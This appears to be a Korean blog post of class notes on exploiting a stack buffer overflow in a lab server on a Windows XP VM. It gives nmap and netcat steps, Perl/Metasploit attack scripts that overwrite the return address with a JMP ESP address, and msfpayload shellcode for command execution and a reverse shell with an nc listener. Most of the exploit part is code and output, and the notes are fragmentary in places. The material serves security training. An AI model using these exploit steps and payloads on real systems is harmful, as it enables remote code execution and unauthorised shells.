## 주소값을 이용한 악성코드 로직
지역변수 부분이 들어가는 부분의 크기를 확인 한 후 그 부분을 모두 채우고 난 뒤
리턴값이 들어가는 부분을
1. port scan - nmap
2. session -nc
3. Attack -perl
\\\\\\\\\\\\\
1.port Scan
#nmap -sS -f XP의 IP -p 6000-7000 (총 65355여개)
xp: 150 linux : 100
2. Session
NC=netcat
# nc Xp의 IP 6235
root@bt:~# nc 192.168.17.150 6235
Hello
server : hi, Client
Hello
09_vuln_server가 문자열을 저장했다가 돌려준다.
func(char *str){
char buf[4];
memcpy(buf,str,1024);
}
.c C
.c c++
.pl perl
\\\\\\\\\\\\\\\\\\\\\\\\\\\ 백트렉
# attac.pl
use lib "/pentest/exploits/framework2/lib";
use Msf::Socket::Tcp;
$conn=Msf::Socket::Tcp->new(
'PeerAddr' => '192.168.17.150',
'PeerPort' => '6235',
);
if($conn->IsError){
print "error:" . $conn->GetError . "\n";
}
$dummy = "A" x 3000;
$conn->Send($dummy . "\r\n");
# 실행
root@bt:~/test# perl attack.pl
\\\\\\\\\\\\\\\\\\\\\\\\\\\윈도우
offset: 41414141 오류가 남
offset은 주소다
----------------
[컴퓨터] 컴퓨터에서 어떤 주소로부터 간격을 두고 떨어진 주소와의 거리. 기억 장치가 페이지 혹은 세그먼트 단위로 나누어져 있을 때 하나의 시작 주소로부터 오프셋만큼 떨어진 위치를 나타내는 것이다.
----------------
복귀주소를 덮어씌워서 생긴상황
abc .... yz A1 A2 A3 ..AA1..AA2로하면 몇번째인지 볼 수 있다
################리눅스 코드
use lib "/pentest/exploits/framework2/lib";
use Msf::Socket::Tcp;
use Pex::Text;
$conn=Msf::Socket::Tcp->new(
'PeerAddr' => '192.168.17.150',
'PeerPort' => '6235',
);
if($conn->IsError){
print "error:" . $conn->GetError . "\n";
}
$Pattern = Pex::Text::PatternCreate(3000); <--패턴3000개
$dummy = "A" x 3000;
$conn->Send($Pattern . "\r\n");
\\\\\\\\\\\\\\\\윈 오류
AppName: 09_vuln_server.exe AppVer: 0.0.0.0 ModName: unknown
ModVer: 0.0.0.0 Offset: 37714136 <-복귀주소
\\\\\\\\\\\\\\\\\리눅스에서 파일체크
root@bt:~# cd /pentest/exploits/framework2/sdk/
root@bt:/pentest/exploits/framework2/sdk# pwd
/pentest/exploits/framework2/sdk
root@bt:/pentest/exploits/framework2/sdk# ll
total 24
drwxr-xr-x 3 root root 4096 2011-05-10 03:41 ./
drwxr-xr-x 14 root root 4096 2011-05-10 03:41 ../
drwxr-xr-x 2 root root 4096 2011-05-10 03:41 docs/
-rwxr-xr-x 1 root root 739 2011-05-05 10:18 formatGen.pl*
-rwxr-xr-x 1 root root 260 2011-05-05 10:18 patternOffset.pl*
-rwxr-xr-x 1 root root 417 2011-05-05 10:18 spitCode.pl*
root@bt:/pentest/exploits/framework2/sdk# vi patternOffset.pl
root@bt:/pentest/exploits/framework2/sdk# vi patternOffset.pl
root@bt:/pentest/exploits/framework2/sdk# ./patternOffset.pl 37714136 3000
500 <--500번째에 위치
~ 예전함수 스택 -> attack
RET jmp esp
SFP --┐500개이다 쓸데없는것
지역--┘
use lib "/pentest/exploits/framework2/lib";
use Msf::Socket::Tcp;
use Pex::Text;
$conn=Msf::Socket::Tcp->new(
'PeerAddr' => '192.168.17.150',
'PeerPort' => '6235',
);
if($conn->IsError){
print "error:" . $conn->GetError . "\n";
}
$jmpesp = "\xED\x1E\x97\x7C";
$Pattern = Pex::Text::PatternCreate(3000);
$dummy = "A" x 3000;
$conn->Send($Pattern . $jmpesp . "\r\n");
\\\\\\\\\\\윈에서 E눌러서 kernel32로 들어가면 jmp esp가 나타난다
7C971EED ? FFE4 JMP ESP
\\\\\\\\\리
oot@bt:/pentest/exploits/framework2# ls
data exploits msfcli msfelfscan msfpayload msfweb sdk tools
docs extras msfconsole msfencode msfpescan nops src
encoders lib msfdldebug msflogdump msfupdate payloads t
root@bt:/pentest/exploits/framework2# ./msfpayload
root@bt:/pentest/exploits/framework2# ./msfpayload win32_exec
어떻게 만들지 설명나옴
Name: Windows Execute Command
Version: $Revision: 1669 $
OS/CPU: win32/x86
Needs Admin: No
Multistage: No
Total Size: 130
Keys: noconn
Provided By:
vlad902 <vlad902 [at] gmail.com>
Available Options:
Options: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required CMD(볼거) The command string to execute
실행이 가능한 문자열 적으면된다.
Advanced Options:
Advanced (Msf::Payload::win32_exec):
------------------------------------
Description:
Execute an arbitrary command
root@bt:/pentest/exploits/framework2# ./msfpayload win32_exec CMD="calc.exe"
root@bt:/pentest/exploits/framework2# ./msfpayload win32_exec CMD="calc.exe"
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99"
"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04"
"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb"
"\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30"
"\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09"
"\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8"
"\x83\xc0\x7b\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff"
"\xe7\x00"; //\x00은 없애야되기에 직접만들어야함
root@bt:/pentest/exploits/framework2# ./msfpayload
win32_reverse
###
xp에서 telnet으로 리눅스에 붙어
리눅스에서 telnet으로 감
root@bt:/pentest/exploits/framework2# ./msfpayload win32_reverse
Name: Windows Reverse Shell
Version: $Revision: 2067 $
OS/CPU: win32/x86
Needs Admin: No
Multistage: No
Total Size: 287
Keys: reverse
Provided By:
vlad902 <vlad902 [at] gmail.com>
Available Options:
Options: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
Advanced Options:
Advanced (Msf::Payload::win32_reverse):
---------------------------------------
Description:
Connect back to attacker and spawn a shell
root@bt:/pentest/exploits/framework2# ./msfpayload win32_reverse LHOST="192.168.180100" LPORT="4321" P
리눅스 아이피 넣고 p (perl)로 하면 실행된다.
root@bt:/pentest/exploits/framework2# ./msfpayload win32_reverse LHOST="192.168.180100" LPORT="4321" P
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68".
"\xff\xff\xff\xff\x66\x68\x10\xe1\x66\x53\x89\xe1\x95\x68\xec\xf9".
"\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68".
"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3".
"\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab".
"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51".
"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6".
"\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6".
"\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";
## 포트 열기
root@bt:~/test# nc -lvp 4321
listening on [any] 4321 ...
#윈
start www.naver.com
start notepad
==============================
==============================
문제 2 port :1000~2000
root@bt:~/test# nmap -sS -f 192.168.17.150 -p 1000-2000
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2013-04-29 22:49 EDT
Nmap scan report for 192.168.17.150
Host is up (0.00057s latency).
Not shown: 1000 filtered ports
PORT STATE SERVICE
1472/tcp open csdm
MAC Address: 00:0C:29:68:99:56 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 20.06 seconds
1472
func (char *str){
char buf[496] // -4(return)
memcpy(buf,str,1024)
}
\\\\\\\\\\\\\\ 9번분석
500-4 = 496의 공간을 안차도록 해야한다.
함수 memcpy, strcpy
문자열 hi,client
mov byte [EDX+500], 0;
소스원본
#define SS_OK 0
void pr(char *str)
{
char buf[500]="";
memcpy(buf,str,strlen(str));
printf("%s\n",buf);
}
void sError(char *str)
{
printf("Error %s", str);
WSACleanup();
}
500byte --SFP가없는 omission
1F4
'리버싱' 카테고리의 다른 글
| 18일차 리버싱, std (0) | 2013.05.01 |
|---|---|
| __cdecl, __pascal, __stdcall의 차이점 (0) | 2013.05.01 |
| 16일차, 복귀주소를 활용한 악성코드 실습 (0) | 2013.04.30 |
| 14일차, 크랙을 응용한 키젠만들기. (0) | 2013.04.30 |
| 13일차 크랙하기. (0) | 2013.04.30 |